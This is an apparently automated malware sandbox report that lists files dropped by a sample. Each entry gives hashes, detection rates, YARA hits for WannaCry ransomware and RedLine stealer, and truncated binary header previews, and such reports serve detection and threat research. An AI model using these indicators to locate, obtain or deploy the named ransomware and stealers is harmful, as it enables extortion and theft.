                                                                                                                                                            SHA1:8731202D2F954421A37B5C9E01D971131BD515F1
                                                                                                                                                            SHA-256:61A9E3278B6BCC29A2A0405B06FB2A3BBCB1751C3DD564A8F94CC89EA957EC35
                                                                                                                                                            SHA-512:386643B0A52B6B1A53E81A8500D040B6415E532EBAFFD1BE8D1AFD4CCB10F6C0342CF734B688EC803B960339284C8D9669E638B1648D9CC734CF7367659C7FD0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.5G..........................................@.........................................................................a.......Y ...e..............................................................................D............................rsrc...ru.......v..................@..@.data................z...................text...Y........................... ..`.rdata..*2.......4..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed, RAR self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):789363
                                                                                                                                                            Entropy (8bit):7.995564811336945
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:ePPNsFNARXFh0Gy9Gtgt09HlncQXZlFeI5D7Cj+o:RNkltHXXZlFeiHab
                                                                                                                                                            MD5:8CD7C19B6DC76C116CDB84E369FD5D9A
                                                                                                                                                            SHA1:5E3ECD3E4EF8ADC294DB1E3525CDBDE46B2B7DDC
                                                                                                                                                            SHA-256:47769A82AC9994BF50FDB7FF521D2364775AFEA3DA02D55450448A25E6F94645
                                                                                                                                                            SHA-512:909D0A2EC4AF33C374D7453926E5999BADD2F9FA79D0648A7308F63911F673AE34EC275917999199E9FB3A669AF5C4AA460E7639C5E346F261DECD28B520039A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......@..................... ...P..p....`........@..........................0................... ..........................<)..........<...........................................................................................................UPX0.....P..............................UPX1.........`......................@....rsrc.... ..........................@..............................................................................................................1.20.UPX!....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):199168
                                                                                                                                                            Entropy (8bit):7.816608369359199
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS
                                                                                                                                                            MD5:8803D517AC24B157431D8A462302B400
                                                                                                                                                            SHA1:B56AFCAD22E8CDA4D0E2A98808B8E8C5A1059D4E
                                                                                                                                                            SHA-256:418395EFD269BC6534E02C92CB2C568631ADA6E54BC55ADE4E4A5986605FF786
                                                                                                                                                            SHA-512:38FDFE0BC873E546B05A8680335526EEC61CCC8CF3F37C60EEE0BC83EC54570077F1DC1DA26142488930EABCC21CB7A33C1B545A194CBFB4C87E430C4B2BFB50
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@.......................... ..........................................................\............................................................................................................text............................... ....rsrc...\........................... ...........IS&.u..n.y...P0..c{. ..J..b.>..o.i...R...3.Ap..3...~.EW_.Y.}+..A.2.h.(N^.....B....e....l.h.}.R....?.....y..(.3....Gp.u..n.....P.j...2.R2.(.7.....5...m).&.G..RvZS....?$. t.z...e|3.-..........pRj...c.....]b.7T*..D..R.s...lS.\.i..0..yL?.....E{......ex..+.\.l..........AS..`_I8.....A..]c.r...h....Z......Z[../.f.}.p...[.6.t...IAx`....K.K@v}.#.x.../R.......@!:A.;E39.J......'1....3.)BE..........TER*b....O........U.rS_<..........E.....@....0v.....|.we.....@].
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3514368
                                                                                                                                                            Entropy (8bit):7.995470941164686
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                                                                                                            MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                                                                                                            SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                                                                                                            SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                                                                                                            SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                                            • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: us-cert code analysis team
                                                                                                                                                            • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: ReversingLabs
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 88%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2511528
                                                                                                                                                            Entropy (8bit):7.210453995706242
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:6kAG2QGTC5xvMdgpdb1KRHGepUu2cGbqPs9+q2HRPTnFVSLE:6kAjQGTCnvMmpYQqPNRPTnF4Y
                                                                                                                                                            MD5:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                                                                            SHA1:893110D8C8451565CAA591DDFCCF92869F96C242
                                                                                                                                                            SHA-256:68B0E1932F3B4439865BE848C2D592D5174DBDBAAB8F66104A0E5B28C928EE0C
                                                                                                                                                            SHA-512:5E9CCDF52EBDB548C3FA22F22DD584E9A603CA1163A622DB5707DBCC5D01E4835879DCFD28CB1589CBB25AED00F352F7A0A0962B1F38B68FC7D6693375E7666D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..v*..v*..v*...*..v*...*..v*...*I.v*...*.v*...*..v*..w*/.v*...*..v*...*..v*...*..v*Rich..v*........PE..L.....V............................Lh............@..................................v....@..................................s..,....@.......................`......@...............................Xm..@...............@....e.......................text............................... ..`.rdata..z...........................@..@.data............0..................@....rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):86016
                                                                                                                                                            Entropy (8bit):7.7036277170460306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:vpeW2JCTz5eDMn1Wi8N36flDRdHOjN0O02SHU00wCpEbE1PDai41lkgD:xH2JCTz5mmYoDRdHOB0O3d00wiEY134D
                                                                                                                                                            MD5:9D15A3B314600B4C08682B0202700EE7
                                                                                                                                                            SHA1:208E79CDB96328D5929248BB8A4DD622CF0684D1
                                                                                                                                                            SHA-256:3AB3833E31E4083026421C641304369ACFD31B957B78AF81F3C6EF4968EF0E15
                                                                                                                                                            SHA-512:9916397B782AAAFA68EB6A781EA9A0DB27F914035DD586142C818CCBD7E69036896767BEDBA97489D5100DE262A554CF14BCDF4A24EDDA2C5D37217B265398D3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 63%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@..........................................$..{(.k..Q...M.D......S5I......3..:........I-..Ea.........:..l~.?~.?~.?.U.?Y.?...?..?p..?..?#..?..?...?e.?.g.?..?Rich~.?........PE..L..._l.H.....................@......0.............@.............................................................................T........=..........................................................................................................UPX0....................................UPX1................................@....rsrc....@.......@..................@..............................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):179477
                                                                                                                                                            Entropy (8bit):7.998951302367822
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:5oVnkybquxcF6U/aVHOBuv7j4/rIUUT4iI5mflT9xuUqywFdiZS3e:5oV5bZxIsV4l/kz4iFh98UqywKw3e
                                                                                                                                                            MD5:6D8C9D01BA5C32AEDC734087CC3D0B1B
                                                                                                                                                            SHA1:F7E58E5EDD203ABC2364922B11B6641D3EE9ADD5
                                                                                                                                                            SHA-256:92E885D1763E4BA1ABC92BEE9B08CA7A2AE358BDA5FE98B31A8E217327982BF7
                                                                                                                                                            SHA-512:090B972E7D854DEE8C1DC45EE3035247EB8AB641C337FF8DA6DC3DBB84FA447DEEE688F760D36FDFB93CCA50D4AB27B5AB3347F75C5E4207A06E0ADA0607E3F7
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........MF..D.U...H.......Endermanch@FakeAdwCleaner.exe.cM2.N....,[Uo.a...#.M.]9(..xG.+...;.0.oT....L....8,..#..SK...n."g.N..[....[........l...F..f RI.Y.;.....L>..ob......k=...Ps.m.`$.....]5Z.F.S......\.fC.k...cp..{.`...u....:.#j.!.d.m.FV.....@X....Q.^....s7..Ml..d~9.y..A...U..J.).I..t.m.M.kg.E)....Me..`..<D=.1P."= ..2q.X...{.........)pcx.$..ZU.....$..|......k.st.E.v..r..{8.d.%..V.!.n....<B.9......?n#Z.U.........Fs..O.^ {.G.R#.]..5..Z....H@64............:+9#5P..J9......D.N.F...j..J...M.bJ$...B.B..(.&7...E....g]sC.L{].-...Th+..f..7.zI....h..k...:?B.!........C.....{....?...35v..........8..f).apaP.....*:....'.....Y.6u.>.?...6........G.s.<....j......-..tv.....H1i.Z....`....`.N .f.c0.uc.../..M ._T..I..Q..6....X..'`3..N..EdU..^....|....EM5.q...Do.....~9.toC......".ZW-...?..&P.....0....f.n.L.ti.Y.....QB....[/..-.M.7......P.....Q.)..!..A...../..OS9.gp....-.:s.$.&sv-\....S....W/~...Y@q..ada.* k6...d*...x`e...\.q.&}./,....i.9.;.,.3...1..}.Url........M"
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):267776
                                                                                                                                                            Entropy (8bit):7.535290233283343
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                                                                            MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                            SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                                                                            SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                                                                            SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: Joe Security
                                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: ditekSHen
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 66%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):203087
                                                                                                                                                            Entropy (8bit):7.998965133479219
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                                                                            MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                                                                            SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                                                                            SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                                                                            SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3.*..:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB.*..S:...C.;.e.H......|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1721302
                                                                                                                                                            Entropy (8bit):7.999903232734228
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:pe9rvkVDuuk8/JWXY/+XyxN7kHBRcuA7/:pedkVDuuk8/YIsy7AHE
                                                                                                                                                            MD5:974918541AA75F380AA6CB4D8BD3C4BD
                                                                                                                                                            SHA1:D0A6A3A301CF5330B00281EE8FF04ED9C3455FC7
                                                                                                                                                            SHA-256:D703FC0DE3F07684528BC1931479815A4B9CD7B66FEDBB753CA21314A6A300D6
                                                                                                                                                            SHA-512:DB829BBA3372A6E452D03D24E998EE91D28E3816C9D1A8D81330D450B24DC695E15D2612EC69729BEAFB28D95271BA55B6BE8B95DBE7F4B15F4F65BF5B5279B5
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........43L....C..........Endermanch@HappyAntivirus.exe.+...)hK..H.; N.:N...HU.2.....|........xbpeu....4...st.,O"...2...$.W..1V..a...>.\f.#p.\...$...<m..Z..:.a..z...Bp.b.B.P..pOZ%r.......J..&){.n..E....s.+C.X.._......c.fj..x+..p.X..U.:./!]}..t.b;..i.x6.bs....Z....@.0..k.v.&N.J.rlS....I.ig5.Ph.~......!O....y6..Kt....<..gR.V^.{...#.k|WTc..5.I.>..u.a.+..uo.!......b.o.%.<!f`:....^9U.5..e.&..aY..z.x../u..a.p..>`.jo,)..t3.)L..i..v....C:.....3..M.&Q0|H...}.b$..&....LP....n....q...\ez....}....B.=.>x(...q..kX.....=.;Sg.t..3.....be../k.w..<.q.i3..#\.:...i.j6..d.........,H.G5C%..W.E...Lm.|.....'...".{.7.z.X..m...m.2].Y.......8F...d..R..Il. .U..}.....P..!....1H:.,%=3.H..?..fD.K.....F.5.+T.c...g..N*1g...}1......,4.x..T...........K.3.....F.-..*..|.".[..Z:.%?....jy%....]..;o2zYY.p.1....>.8;......n.%|$.;px}..N.%...y.0.Z%.~.....f....@.3o|....nGE-..{2..@...$$..3[.....*.o.p.+....3.0[..../..v..(..%.@.......|...<X..........y_.f ......oKAN..F8..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34300
                                                                                                                                                            Entropy (8bit):7.994524271759185
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                                                                            MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                                                                            SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                                                                            SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                                                                            SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.|V.NtQ*.#2.YoP..S;.}|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... |E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^.*.;...s..Nu.)...*7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....|:|..k..l.....*..<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t|z.........rmq}G..P...o.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2580873
                                                                                                                                                            Entropy (8bit):7.999939102869259
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:49152:TYlQo7QjNMZJRM4KEInWDwuK9fhCvLtoLCd:COjN6M4nU9p2toud
                                                                                                                                                            MD5:C5AFBB8DA79525BA74AA0FDC5BB5D17A
                                                                                                                                                            SHA1:19A7BB8F31F40592C350555EB450924193AA5AEF
                                                                                                                                                            SHA-256:5F3C2E1AD778441373CBFDC5D07884376175A9409E260E60EDD292A95F9BC4CA
                                                                                                                                                            SHA-512:36CD962AE3C4C0BEC993A1C379130FFBD5EF475E234E4CCFEBD51F4E52FF6861BC3C1EE6AB20DF4E8A1B04F4BA7F2F9437C9BCFBAD9573CFFC74A4680DDEC589
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c...@.....`'..@b.$...Endermanch@InternetSecurityGuard.exe......AE...^...]|S-..O....A#.#...U....%.....!....X.4.m..Y.M.".A....u.l*5zq....z...Q]...n...c.Y.G..(..O.........S..gx.(,n.7.M....m..d.......iB..SF.00..s.67..'..e.Vi...?Fa..62..E}..(......g...............7....f........-M'..3.,.8....^.~.{....'!.7.y.....L..;i.fX..E.......u......Er+....-..BVU...3.2WED.._.....<o.S.E.1J....j*ud.;S>...C..f...p.).."B/xlx.Y.C..lM.."~./....0._.=s.R.5,._........k..PE&...7.>..c..J%l......I..H....NA..=}...P.9....xb.q..H?.....+.../G....G..0.5...H(Z u.roob..A.;.:9U...."z..........).v-..Dq.^..".Hk.w..F!.t....z.H.......C.].Q.r ..Z).aa..#.Z..Y.lE.6..a.M..V....F..(=T...g.`.......ae.h.....R%.Q..........t.&%.kF.7PK.I.Q..."'9.Qb..0..n.z....,y.Q.....!w3.2.......:P.......%........G.2^Mw&..U..iP..>.G..N.........W..S7.vQ.4.../.HG../..o9.$5".I...&h(.....qU..>....P.V..,.7..c..u..?../.7+4.]e.'...#a.II..lM.2.<...lm....~.....C'.D.Qur;y>..<V....~... .n.r9.P....+3h....w..nM....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26359
                                                                                                                                                            Entropy (8bit):7.99208020012939
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                                                                            MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                                                                            SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                                                                            SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                                                                            SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H*.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f..*......c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4|*.#>"..G.0fN...L..b.*...pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h|9V.^aZ.#.....B..P.|...gk...n...\-.....3..:P....Y.....^.....j..Ty..|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1034690
                                                                                                                                                            Entropy (8bit):7.9997993383764445
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:GZTNiabEMrMDc3Hf80xcwCz+cjMhnY7zMCSbkDOBa3aizyvlZ1jJnap:G1Ni8EMIcXdewOXMcMfa3p4z15ap
                                                                                                                                                            MD5:7A5994FAB80A2ED6ADF59A93C7BC2D88
                                                                                                                                                            SHA1:FE2DDCEFD45C378DFB19817DE118FCF151C59B1F
                                                                                                                                                            SHA-256:6EBAD2EA4D537EB1CE11DD19D495FCA3E2B8B4E50140D9B241B71F5F1BC71804
                                                                                                                                                            SHA-512:5BA499F12ED0A5DE31350530402327DC323AAE7D414EE972BD652265E5226ADEF71D94C0B52A3BF0EBE8F95081C3C27708758EF15DA58163492AFDB664E08AD2
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........c.N.4[.............Endermanch@LPS2019.exe..b.J ...M........k.L.*..(. ..S.x.*X0.....>...'k...o.t.C.2.........i....).s+..2.t/..f.e...)...&..E..Z..y..b.&...c.....v...>..d`{.....V...2.......T/.7....gi.L....5...B>.5.....!.8Q...KT.L..HB.......P?.....=...YH*T....*.~f...W..?.@).jR..'e/7F_.S.$c.O...F...#.e.Q...(.)...*.D&w..y......p......qh..|.F.6.O... R...O....l....ycc..4.y...+p(.s.......wq.VC....7. .I.A.-....U.-..@.a7k.j.......Q<.+..^.fij...#.3m/.......}...5..k$/&.]b?. ...E.......7.h.Q!)..D.VID:q..E.c....0.../....U.._..<=.Q..|.]wq^.......g.o...Y..\.[..e....o.N....;.?..?.......zR`.q6...g(.t ..9..(..;.L......... j~0e...K.qr[O..."...43....8~t....i..*....q.+<...."q.......f...X$..m..<x.....y...%...V...A......d..}........8;s....x=U+....\..Y..|.t.x..#.CA..m..t.../8........q...VV*BW...M.:>F.,..RR......\|.....PTC.&....I....g_..go.F_:...x.E....N.%..=..%.T..A........2..h.........l>...\.A...).cT....f"[Y...0..7C.W..(......lN..!..~k.X%-...)..-.;.0.-..+.^{f0
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):384539
                                                                                                                                                            Entropy (8bit):7.9994843619449485
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:6144:zk0gUeiDOm+YiE8ZtuKsFcxWSmycwbZFa3fPPG7ye3B95/HqXTVF5Ca0s4V:w0gUeKCZjsjSlXVF2e7y2rvqDPEaP4
                                                                                                                                                            MD5:711743BFCFFBC075F3DF90412D33B1F4
                                                                                                                                                            SHA1:5A8157AEA7D2B424F07673597BE661A44517E653
                                                                                                                                                            SHA-256:0C5BB6B0098682F3CC63B95BD2F218D6186BD8F4E322B3A048107F20602AFB2B
                                                                                                                                                            SHA-512:969E3699B5CCBF70C19C251E487B843160F8A24F284B85A6AC96E917114F0BF45EAC8F3BFF8837A66C4FDCBF6F71AE4E11E81317F7F89E03B5DC468CE2FEFFF2
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
